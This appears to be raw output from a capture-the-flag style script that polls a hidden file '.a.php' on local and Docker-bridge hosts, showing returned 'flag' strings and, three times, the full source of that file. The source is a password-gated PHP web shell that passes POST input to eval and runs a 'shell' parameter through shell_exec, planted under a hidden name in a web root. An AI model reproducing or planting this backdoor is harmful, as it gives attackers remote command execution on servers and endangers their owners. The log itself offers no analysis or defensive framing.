/var/www/html
http://127.0.0.1/.a.php:
string(5) "flag
"
http://127.0.0.1/.a.php:
string(5) "flag
"
http://172.17.0.1/.a.php:
string(5) "flag
"
http://127.0.0.1/.a.php:
NULL
http://127.0.0.1/.a.php:
NULL
http://172.17.0.1/.a.php:
NULL
http://127.0.0.1/.a.php:
string(5) "flag
"
http://127.0.0.1/.a.php:
string(5) "flag
"
http://172.17.0.1/.a.php:
string(5) "flag
"
http://127.0.0.1/.a.php:
string(296) "<?php

    if(md5($_POST["pass"])=="495db1f6f1d1eab24a79824060e7cbd7"){
        eval($_POST[a]);
        if($_POST["shell"]){
            $opcode = $_POST["shell"];
            $out=shell_exec($opcode);
            var_dump($out);
        }
    }
    else{
        echo "error passwd";
    }

?>
"
http://127.0.0.1/.a.php:
string(296) "<?php

    if(md5($_POST["pass"])=="495db1f6f1d1eab24a79824060e7cbd7"){
        eval($_POST[a]);
        if($_POST["shell"]){
            $opcode = $_POST["shell"];
            $out=shell_exec($opcode);
            var_dump($out);
        }
    }
    else{
        echo "error passwd";
    }

?>
"
http://172.17.0.1/.a.php:
string(296) "<?php

    if(md5($_POST["pass"])=="495db1f6f1d1eab24a79824060e7cbd7"){
        eval($_POST[a]);
        if($_POST["shell"]){
            $opcode = $_POST["shell"];
            $out=shell_exec($opcode);
            var_dump($out);
        }
    }
    else{
        echo "error passwd";
    }

?>
"
